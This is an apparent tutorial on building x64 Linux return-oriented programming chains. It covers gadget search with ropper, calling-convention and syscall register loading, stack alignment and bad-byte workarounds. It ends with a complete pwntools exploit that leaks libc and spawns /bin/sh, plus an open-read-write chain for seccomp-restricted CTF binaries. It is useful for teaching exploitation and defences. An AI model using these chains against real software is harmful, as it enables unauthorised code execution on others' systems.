x64 ROP Chains: Systematic Gadget Hunting

Building ROP chains on x64 Linux - finding gadgets with ropper, handling calling conventions, chaining syscalls, dealing with bad characters, stack alignment, and a complete worked example.

Why x64 ROP Is Different from x86 ROP

Three things change everything when moving from 32-bit to 64-bit ROP:

  1. Register-based calling convention: x86 cdecl pushed every argument on the stack, so a chain that called system("/bin/sh") was mechanically [&system, junk_return, &"/bin/sh"]. On x64 the first six arguments live in registers, so the chain has to load registers first.
  2. Address space size: every gadget address is now 8 bytes, and the upper two to five of them are \x00 (0x401234 packs as 34 12 40 00 00 00 00 00). If your overflow goes through strcpy/strcat/sprintf (anything null-terminated), the copy stops at the first \x00, so only the final address in the payload can contain one.
  3. Stack alignment: the System V ABI mandates 16-byte RSP alignment immediately before a call instruction. SSE-using libc functions (printf, system) crash on movaps if you violate this.

This post is a systematic walkthrough of how to build chains that survive all three.
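To make the first two differences concrete, here is a minimal sketch that builds the same system("/bin/sh") call for both architectures and counts the null bytes in each. All addresses are made up for illustration, and p32/p64 are local stand-ins for the pwntools helpers of the same name.

```python
import struct

def p32(value):
    """Pack an integer as 4 little-endian bytes (stand-in for pwntools' p32)."""
    return struct.pack("<I", value)

def p64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

# Hypothetical addresses, for illustration only.
SYSTEM_32, BINSH_32 = 0x08048430, 0x0804A024
POP_RDI, RET, SYSTEM_64, BINSH_64 = 0x401233, 0x40101A, 0x401050, 0x404028

# x86 cdecl: the argument sits on the stack, after a fake return address.
chain_x86 = p32(SYSTEM_32) + p32(0xDEADBEEF) + p32(BINSH_32)

# x64 System V: load rdi first, realign with a bare ret, then enter system().
chain_x64 = p64(POP_RDI) + p64(BINSH_64) + p64(RET) + p64(SYSTEM_64)

print("x86 chain:", len(chain_x86), "bytes,", chain_x86.count(b"\x00"), "null bytes")
print("x64 chain:", len(chain_x64), "bytes,", chain_x64.count(b"\x00"), "null bytes")
```

With these example addresses the 32-bit chain contains no null bytes at all, while every 64-bit slot carries five of them, which is why a strcpy-style overflow that was trivial on x86 becomes awkward on x64.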

x64 Calling Convention

On Linux x64, the first 6 arguments go in registers: rdi, rsi, rdx, rcx, r8, r9. A ROP chain must load these registers via pop; ret gadgets before calling the target function.

Argument  Register  Typical use
1         rdi       first pointer/value
2         rsi       second pointer/value
3         rdx       third pointer/value (also read/write count)
4         rcx       fourth pointer/value (note: syscalls clobber rcx - use r10 for syscall arg 4 instead)
5         r8        fifth pointer/value
6         r9        sixth pointer/value

Return value lands in rax. Floating-point arguments use xmm0..xmm7 (rare in exploit work). For variadic functions like printf, al must hold an upper bound on the number of vector registers used (typically 0 for plain ROP).
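The register order can be turned into a small chain builder. This is a sketch, not a replacement for pwntools' ROP class: call_chain, the gadgets dictionary and every address are hypothetical, and it assumes a clean pop reg; ret gadget exists for each register it is asked to load.

```python
import struct

# System V AMD64 integer-argument registers, in call order.
ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def p64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

def call_chain(gadgets, func_addr, *args):
    """Build [pop reg; ret, value]... followed by the function address.

    gadgets maps a register name to the address of its 'pop <reg>; ret'.
    """
    if len(args) > len(ARG_REGS):
        raise ValueError("stack-passed arguments are not handled in this sketch")
    chain = b""
    for reg, value in zip(ARG_REGS, args):
        if reg not in gadgets:
            raise KeyError(f"no 'pop {reg}; ret' gadget available")
        chain += p64(gadgets[reg]) + p64(value)
    return chain + p64(func_addr)

# Hypothetical gadget and function addresses.
gadgets = {"rdi": 0x401233, "rsi": 0x401231}
chain = call_chain(gadgets, 0x401050, 0x404028, 0)
print(chain.hex())
```

Asking for a third argument with this gadget set raises KeyError, which mirrors the usual situation in small binaries: rdi and rsi are easy, rdx is not.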

Why Registers Make Life Harder

For system("/bin/sh") you need exactly one register (rdi) loaded with a pointer to /bin/sh. For execve("/bin/sh", argv, envp) via syscall you need three argument registers (rdi, rsi, rdx) plus rax = 59; syscalls that take a fourth argument also need r10, which takes the place of rcx. Each register requires a pop reg; ret gadget - and the more registers you need, the harder it is to find clean ones.

Finding Gadgets

ropper --file vuln --search "pop rdi"
ropper --file vuln --search "pop rsi; pop r15"
ropper --file vuln --search "ret"  # for stack alignment

ropper and ROPgadget are the two standard tools. Both walk the executable sections, scan backwards from every ret/jmp reg/call reg for any byte sequence that decodes as valid x64 instructions, and emit a list. Use either; pwntools’ ROP() class ships its own, simpler gadget finder that covers the common pop/ret cases.
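The "any byte sequence that decodes" part is what makes gadget hunting productive: gadgets can start in the middle of an intended instruction. The toy scanner below only knows the one-byte encodings of pop rax/rdx/rsi/rdi and ret (0xC3), which is far less than ropper does, but it is enough to show the effect. The base address is made up.

```python
# One-byte encodings of `pop <reg>` for four legacy registers; 0xC3 is `ret`.
POP_OPCODES = {0x58: "rax", 0x5A: "rdx", 0x5E: "rsi", 0x5F: "rdi"}
RET = 0xC3

def find_pop_ret(code, base=0):
    """Return (address, text) for every 'pop <reg>; ret' byte pair in code."""
    hits = []
    for i in range(len(code) - 1):
        if code[i] in POP_OPCODES and code[i + 1] == RET:
            hits.append((base + i, f"pop {POP_OPCODES[code[i]]}; ret"))
    return hits

# Tail of a typical epilogue as the compiler emitted it:
#   41 5e   pop r14
#   41 5f   pop r15
#   c3      ret
blob = bytes.fromhex("415e415fc3")

for addr, text in find_pop_ret(blob, base=0x401230):
    print(hex(addr), text)
```

The compiler never emitted pop rdi here. Skipping the 0x41 REX prefix of pop r15 leaves 5f c3, which decodes as pop rdi; ret, and that is where most pop rdi gadgets in small binaries come from.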

Useful Search Patterns

# Direct register loaders
ropper -f vuln --search 'pop rdi; ret'
ropper -f vuln --search 'pop rsi; ret'
ropper -f vuln --search 'pop rdx; ret'

# Two-register / multi-register variants when single ones don't exist
ropper -f vuln --search 'pop rsi; pop r15; ret'   # very common
ropper -f vuln --search 'pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret'

# Syscall / direct syscall
ropper -f vuln --search 'syscall'
ropper -f vuln --search 'syscall; ret'

# Memory-write primitives
ropper -f vuln --search 'mov qword ptr [rdi], rsi; ret'   # arbitrary 8-byte write
ropper -f vuln --search 'xchg rax, rsp'                   # stack pivot

# Alignment
ropper -f vuln --search 'ret'                              # any clean ret

# Static binaries - search libc bundled into the ELF
ROPgadget --binary vuln | grep ': pop rdx'

Where to Search When the Binary Is Sparse

Small binaries, especially dynamically linked ones that contain little code of their own, sometimes have no pop rdx; ret at all. Sources of additional gadgets:

Source                                   When available
libc.so.6 (after libc leak)              Dynamic binary, libc gadgets after stage-1 leak
ld-linux-x86-64.so.2                     Mapped in every dynamically linked process (needs its own leak under ASLR); small but contains a few useful pop-r* / syscall gadgets
vsyscall page (0xffffffffff600000)       Only on older kernels; contains a few fixed syscall entry points
Existing functions used “in the middle”  A function epilogue (add rsp, X; pop r12; pop r13; pop rbp; ret) often serves as a multi-pop gadget
__libc_csu_init (pre-glibc-2.34)         The Universal-Gadget - a 6-pop epilogue that lets you load r12-r15 + rbp + rbx in one shot

The “csu_init Universal Gadget”

In binaries linked against glibc < 2.34, __libc_csu_init ends with a stylised epilogue that ROP chains love:

__libc_csu_init+90:    pop rbx
__libc_csu_init+91:    pop rbp
__libc_csu_init+92:    pop r12
__libc_csu_init+94:    pop r13
__libc_csu_init+96:    pop r14
__libc_csu_init+98:    pop r15
__libc_csu_init+100:   ret

__libc_csu_init+74:    mov rdx, r15
__libc_csu_init+77:    mov rsi, r14
__libc_csu_init+80:    mov edi, r13d
__libc_csu_init+83:    call qword ptr [r12 + rbx*8]

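A two-stage chain: first return to +90 to load all six registers, then return to +74, which copies r15, r14 and r13d into rdx, rsi and edi and executes call [r12+rbx*8]. Three details matter. r12 must point at a memory slot that holds the function's address (a GOT entry works), not at the function itself. Only the low 32 bits of rdi are written. And after the call, execution falls into the function's loop check (add rbx, 1; cmp rbp, rbx; jne), so set rbx = 0 and rbp = 1 and supply seven more qwords for the add rsp, 8 and the six pops that follow. The exact offsets and register assignments differ between compiler versions, so check the disassembly. This solves the “no pop rdx; ret exists” problem on most pre-2.34 binaries.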
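A sketch of that two-stage chain, using the register assignment from the listing above (r13d → edi, r14 → rsi, r15 → rdx, call [r12 + rbx*8]). It assumes the usual tail after the call (add rbx, 1; cmp rbp, rbx; jne; add rsp, 8; six pops; ret), which the listing does not show. The function name ret2csu and all addresses are hypothetical.

```python
import struct

def p64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

def ret2csu(csu_pop, csu_call, func_ptr_slot, arg1, arg2, arg3, next_ret):
    """Call *func_ptr_slot(arg1, arg2, arg3) through the two csu gadgets.

    csu_pop  : address of 'pop rbx; pop rbp; pop r12; ...; pop r15; ret'
    csu_call : address of 'mov rdx, r15; mov rsi, r14; mov edi, r13d; call ...'
    """
    if arg1 > 0xFFFFFFFF:
        raise ValueError("only edi is written, so arg1 must fit in 32 bits")
    chain = p64(csu_pop)
    chain += p64(0)              # rbx = 0 -> call [r12 + 0*8]
    chain += p64(1)              # rbp = 1 -> rbx + 1 == rbp, loop exits
    chain += p64(func_ptr_slot)  # r12: slot holding the target address (e.g. GOT)
    chain += p64(arg1)           # r13 -> edi
    chain += p64(arg2)           # r14 -> rsi
    chain += p64(arg3)           # r15 -> rdx
    chain += p64(csu_call)
    chain += p64(0) * 7          # filler for add rsp, 8 plus the six pops
    chain += p64(next_ret)       # where execution continues afterwards
    return chain

# Hypothetical addresses: write(1, 0x404018, 8) through write's GOT slot.
chain = ret2csu(0x40125A, 0x401240, 0x404020, 1, 0x404018, 8, 0x401136)
print(len(chain), "bytes")
```

The cost is size: one three-argument call takes 16 stack slots, so this only fits when the overflow is generous.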

In glibc 2.34+, __libc_csu_init is no longer linked into the binary (the init-array loop moved into __libc_start_main inside libc) - search elsewhere.

Common x64 ROP Pattern

rop = b""
rop += p64(pop_rdi)        # pop rdi; ret
rop += p64(bin_sh_addr)     # "/bin/sh" string address
rop += p64(ret)             # stack alignment (16-byte)
rop += p64(system_addr)     # system()

This is the canonical “you have a libc leak” payload. The ret between the argument loader and the call to system exists for one purpose only - adding 8 bytes to RSP so that by the time system’s prologue executes its movaps, RSP is 16-aligned.

When You Need More Than Three Lines

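A real chain is rarely this clean. With ASLR on, you usually need two stages: leak a libc address, return to main, then send a second chain built from the resolved libc base: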

rop  = p64(pop_rdi) + p64(elf.got['puts'])    # arg1 = puts@got
rop += p64(plt_puts)                          # call puts(puts@got) → leak libc
rop += p64(elf.symbols['main'])               # return to main, restart with libc base known

# After receiving the leak, build chain 2 with libc.address resolved
rop2  = p64(pop_rdi) + p64(libc_binsh)
rop2 += p64(ret_align)
rop2 += p64(libc.symbols['system'])
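Between the two chains sits one piece of arithmetic: turning the bytes that puts printed into a libc base. A minimal sketch of that step follows, with a sanity check that catches most wrong-libc mistakes. The function name, the puts offset and the leaked address are made-up example values.

```python
import struct

def libc_base_from_leak(raw, symbol_offset):
    """Convert leaked little-endian address bytes into a libc base address.

    raw           : the bytes puts() printed before its newline (usually 6)
    symbol_offset : offset of the leaked symbol inside libc
    """
    if len(raw) > 8:
        raise ValueError("a leaked address cannot be longer than 8 bytes")
    address = struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]
    base = address - symbol_offset
    # A mapped library always starts on a page boundary.
    if base & 0xFFF:
        raise ValueError("base is not page aligned: wrong libc or truncated leak")
    return base

PUTS_OFFSET = 0x80E50                                 # hypothetical offset of puts
leak = struct.pack("<Q", 0x7F1234A80E50)[:6]          # what puts would print
print(hex(libc_base_from_leak(leak, PUTS_OFFSET)))
```

puts stops at the first null byte, which is why only six bytes arrive and the value has to be padded back to eight before unpacking.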

Syscall ROP Chain

For a direct execve syscall:

rop  = p64(pop_rax) + p64(59)              # syscall number for execve
rop += p64(pop_rdi) + p64(bin_sh)           # filename = "/bin/sh"
rop += p64(pop_rsi) + p64(0)               # argv = NULL
rop += p64(pop_rdx) + p64(0)               # envp = NULL
rop += p64(syscall_ret)                     # syscall; ret

Linux x64 Syscall ABI (vs. function call)

This catches people every time. Function calls use rcx for arg 4. Syscalls use r10 for arg 4 because the syscall instruction itself overwrites rcx with the return address (and r11 with RFLAGS) so that sysret can resume user code. The syscall number goes in rax. The common syscalls and their numbers:

#   Name      Args
0   read      rdi=fd, rsi=buf, rdx=count
1   write     rdi=fd, rsi=buf, rdx=count
2   open      rdi=pathname, rsi=flags, rdx=mode
10  mprotect  rdi=addr, rsi=len, rdx=prot
59  execve    rdi=pathname, rsi=argv, rdx=envp
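The table and the r10 rule fit in a few lines of code. The sketch below builds a syscall chain from a name and arguments; syscall_chain, the gadgets dictionary and all addresses are hypothetical, and it assumes a pop reg; ret exists for every register used plus a syscall; ret gadget.

```python
import struct

# Syscall argument registers: identical to function calls except r10 in slot 4.
SYSCALL_ARG_REGS = ["rdi", "rsi", "rdx", "r10", "r8", "r9"]
SYSCALL_NUMBERS = {"read": 0, "write": 1, "open": 2, "mprotect": 10, "execve": 59}

def p64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

def syscall_chain(gadgets, name, *args):
    """Load the arguments, then rax, then return into 'syscall; ret'."""
    if len(args) > len(SYSCALL_ARG_REGS):
        raise ValueError("a syscall takes at most six arguments")
    chain = b""
    for reg, value in zip(SYSCALL_ARG_REGS, args):
        chain += p64(gadgets[reg]) + p64(value)
    chain += p64(gadgets["rax"]) + p64(SYSCALL_NUMBERS[name])
    return chain + p64(gadgets["syscall"])

# Hypothetical gadget addresses.
gadgets = {"rax": 0x401240, "rdi": 0x401233, "rsi": 0x401236,
           "rdx": 0x401239, "syscall": 0x40124A}

# mprotect(0x404000, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC)
chain = syscall_chain(gadgets, "mprotect", 0x404000, 0x1000, 7)
print(len(chain), "bytes")
```

rax is loaded last on purpose: many multi-instruction gadgets clobber it as a side effect, so setting it right before the syscall is the safer order.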

When system Is Off-Limits

Sandboxed CTF binaries frequently seccomp away execve (and fork, clone, etc.), forcing an “open-read-write” chain (ORW):

rop  = p64(pop_rdi) + p64(flag_path)
rop += p64(pop_rsi) + p64(0)                 # O_RDONLY
rop += p64(pop_rax) + p64(2)                 # SYS_open
rop += p64(syscall_ret)                      # rax = fd

rop += p64(pop_rdi) + p64(3)                 # fd (assume 3)
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(0)                 # SYS_read
rop += p64(syscall_ret)

rop += p64(pop_rdi) + p64(1)                 # stdout
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(1)                 # SYS_write
rop += p64(syscall_ret)

Stack Alignment

System V ABI requires 16-byte stack alignment before call. If your chain crashes in system() or printf(), insert an extra ret gadget.

Diagnosing the Crash

The fingerprint of a stack-alignment crash is unmistakable:

gdb-peda$ x/i $rip
=> 0x7f9...:    movaps XMMWORD PTR [rsp+0x50], xmm0
gdb-peda$ p/x $rsp & 0xf
$1 = 0x8       ← off by 8, classic alignment bug

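movaps and movdqa require 16-byte aligned operands; an unaligned access raises SIGSEGV. A real call pushes an 8-byte return address onto an aligned stack, so compiled code expects RSP & 0xf == 8 at function entry. A ROP chain enters the function through ret instead, so RSP must end in 0x8 right after that ret, which means the stack slot holding the function's address must itself be 16-byte aligned.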

The 8-Byte Rule

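Every 8-byte slot the chain consumes, whether a gadget address or a popped value, advances RSP by 8. A compiler-generated function is entered with RSP ending in 0x8, so the saved return address you overwrite (slot 0 of the chain) sits at 0x...8, slot 1 at 0x...0, and so on. Count slots up to the function's address:

  • Function address in an odd-numbered slot (1, 3, 5, ...) → aligned on entry.
  • Function address in an even-numbered slot (0, 2, 4, ...) → off by 8, insert a single ret gadget to fix.

If an earlier stage already re-entered the vulnerable function through the chain, the parity can flip, so confirm RSP in a debugger. In practice, a single bare ret between the last argument-loader and the function call fixes most of these crashes.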
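The parity argument can be checked mechanically. This sketch assumes the vulnerable function was entered by an ordinary call, so the overwritten return address (slot 0) sits at an address ending in 0x8; the function name is made up.

```python
def function_entry_aligned(slot_index):
    """Report whether a function whose address sits in chain slot `slot_index`
    (0 = the overwritten return address) is entered with RSP % 16 == 8.

    Assumes slot 0 lives at an address ending in 0x8, as it does when the
    vulnerable function was reached through a normal call.
    """
    slot0_low_bits = 0x8
    # The ret that enters the function pops its slot, so RSP ends up
    # one slot past it.
    rsp_after_ret = slot0_low_bits + 8 * (slot_index + 1)
    return rsp_after_ret % 16 == 8

# [pop rdi, "/bin/sh", system]       -> system is in slot 2
print("without ret:", function_entry_aligned(2))
# [pop rdi, "/bin/sh", ret, system]  -> system is in slot 3
print("with ret:   ", function_entry_aligned(3))
```

Only the low four bits of the address matter here, which is why the check works without knowing the real stack address.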

Dealing with Bad Characters

If certain bytes (like \x00 or \x0a) are filtered, find alternate gadgets or use add/sub gadget chains to construct addresses without bad bytes.

Common Bad Character Sets

Source of overflow          Likely banned bytes
gets, fgets                 \x0a (newline)
read from network           usually none, full 8-bit clean
strcpy, strcat              \x00
scanf("%s", ...)            whitespace: \x09 \x0a \x0b \x0c \x0d \x20
recv followed by strncpy    \x00

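Because x64 user-space addresses have \x00\x00 in their top two bytes, every packed address ends in null bytes. When null bytes are forbidden, such an address is unusable mid-chain and can only appear as the last 8 bytes of the payload, where the copy's own terminator and the zero bytes already on the stack supply the missing upper bytes.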
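Before sending anything, it is worth scanning the finished payload for banned bytes rather than discovering them through a truncated copy. A minimal sketch, with a made-up helper name and a made-up address that happens to contain 0x0a:

```python
import struct

def p64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

def find_bad_bytes(payload, bad):
    """Return (offset, byte) for every byte of payload that appears in bad."""
    return [(offset, byte) for offset, byte in enumerate(payload) if byte in bad]

# Hypothetical gadget address whose low byte is a newline.
payload = b"A" * 8 + p64(0x40120A)

for offset, byte in find_bad_bytes(payload, b"\x00\x0a"):
    print(f"offset {offset}: 0x{byte:02x}")
```

Running the check with only b"\x0a" as the banned set models a gets-style overflow, and adding \x00 models strcpy. The offsets tell you which chain slot needs a different gadget.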

Building Bad-Byte-Free Addresses

If you need address 0x401234 but \x00 is banned, two tactics:

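  1. Compute via arithmetic gadgets. This only helps if the gadget addresses themselves are free of bad bytes, and it assumes pop rbx; ret and sub rax, rbx; ret gadgets exist:

    rop  = p64(pop_rax) + p64(0x0101010101411335)   # 0x401234 + 0x0101010101010101, no \x00 byte
    rop += p64(pop_rbx) + p64(0x0101010101010101)   # the mask to subtract, also \x00-free
    rop += p64(sub_rax_rbx)                         # sub rax, rbx; ret → rax = 0x401234
    rop += p64(jmp_rax)

  2. Two-stage delivery: get the full chain into a clean writable region (.bss, heap) through a path that does not filter bytes, for example a read() call or a copy gadget, then pivot the stack into that region (xchg rsp, rax; ret).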
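For the arithmetic tactic, the pair of constants does not have to be found by hand. The sketch below searches for a mask made of one repeated byte such that both the mask and target + mask avoid the banned bytes; subtracting the mask at run time then recovers the target. The function names are made up, and the search is deliberately simple, so it can fail for targets where no repeated-byte mask works.

```python
import struct

def has_bad(value, bad):
    """True if the 8-byte little-endian encoding of value contains a bad byte."""
    return any(byte in bad for byte in struct.pack("<Q", value))

def split_value(target, bad):
    """Return (encoded, mask) with (encoded - mask) % 2**64 == target,
    where neither encoded nor mask contains a byte from bad."""
    for repeated in range(1, 256):
        mask = repeated * 0x0101010101010101
        encoded = (target + mask) % 2**64
        if not has_bad(mask, bad) and not has_bad(encoded, bad):
            return encoded, mask
    raise ValueError("no repeated-byte mask avoids the bad bytes")

encoded, mask = split_value(0x401234, b"\x00")
print(hex(encoded), "-", hex(mask), "=", hex((encoded - mask) % 2**64))
```

The two returned values are what the chain pops into the registers used by a subtract gadget; the gadget addresses themselves still have to pass the same bad-byte check.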

Bad Bytes Inside Libc Addresses

Under ASLR, a libc address has the form 0x00007f?????????? - the 0x7f byte is rarely a problem, but the two top \x00 bytes are whenever nulls are banned, and any randomized byte can collide with a bad character on a given run. The same arithmetic-gadget tricks apply, using constants computed from the stage-1 leak.

Worked Example: Tying It All Together

from pwn import *

context.binary = elf = ELF('./vuln')   # also sets context.arch to amd64 so asm() emits 64-bit code
libc = ELF('./libc.so.6')
io   = process('./vuln')

# ---- Gadgets in the binary ----
pop_rdi  = next(elf.search(asm('pop rdi; ret'),  executable=True))
ret_g    = next(elf.search(asm('ret'),           executable=True))

# ---- Stage 1: leak libc through puts ----
chain1  = b'A' * 0x40 + b'B' * 8                         # buffer + saved RBP
chain1 += p64(pop_rdi) + p64(elf.got['puts'])
chain1 += p64(elf.plt['puts'])
chain1 += p64(elf.symbols['main'])

io.sendlineafter(b'> ', chain1)
leak = u64(io.recvn(6).ljust(8, b'\x00'))   # recvn waits for all 6 address bytes
libc.address = leak - libc.symbols['puts']
log.success(f'libc base = {hex(libc.address)}')

# ---- Stage 2: execve("/bin/sh", 0, 0) via direct syscall ----
# The offsets below belong to one specific libc build; regenerate them with ropper for yours
pop_rax     = libc.address + 0x000000000003a738    # pop rax; ret
pop_rsi     = libc.address + 0x000000000002601f    # pop rsi; ret
pop_rdx     = libc.address + 0x0000000000142c92    # pop rdx; ret
syscall_ret = libc.address + 0x0000000000091316    # syscall; ret
binsh       = next(libc.search(b'/bin/sh\x00'))

chain2  = b'A' * 0x40 + b'B' * 8
chain2 += p64(pop_rax) + p64(0x3b)                 # SYS_execve
chain2 += p64(pop_rdi) + p64(binsh)
chain2 += p64(pop_rsi) + p64(0)
chain2 += p64(pop_rdx) + p64(0)
# No alignment ret here: a raw syscall ignores RSP alignment (ret_g is for libc calls such as system)
chain2 += p64(syscall_ret)

io.sendlineafter(b'> ', chain2)
io.interactive()

A Few More Tactics Worth Knowing

  • SROP (Sigreturn-Oriented Programming): forge a signal frame (sigcontext) on the stack, set rax = 15 (rt_sigreturn) and return to a syscall gadget. The kernel then loads every register, including rip and rsp, from the frame in one step. Useful when conventional pop reg; ret gadgets are scarce.
  • JOP/COP: when ret instructions are restricted (rare on Linux, common in some embedded/Windows-CFG-protected binaries), use jmp [reg] or call [reg] chains instead.
  • mprotect + shellcode: make a writable region executable with mprotect, place shellcode there, jump to it. Lets you escape ROP entirely once you have the primitive.
  • Stack pivot: xchg rsp, rax, mov rsp, rbp; pop rbp; ret, leave; ret - pivot RSP into a controlled region (e.g. .bss, the heap, or anywhere your input was copied).
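  • CET / Shadow Stack mitigations: Intel CET enforces a parallel shadow stack - every ret checks the saved return address against the shadow copy, so pure ROP fails. JOP and COP avoid ret and therefore sidestep the shadow stack, but CET's other half, Indirect Branch Tracking, restricts indirect jmp/call targets to endbr64 landing pads, and shadow-stack-aware kernels also validate sigreturn. Expect all of these techniques to be constrained on fully CET-enabled targets.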

Master the x64 calling convention and you can build a ROP chain for any binary. The rest is just finding the right gadgets - and the discipline to keep RSP aligned.
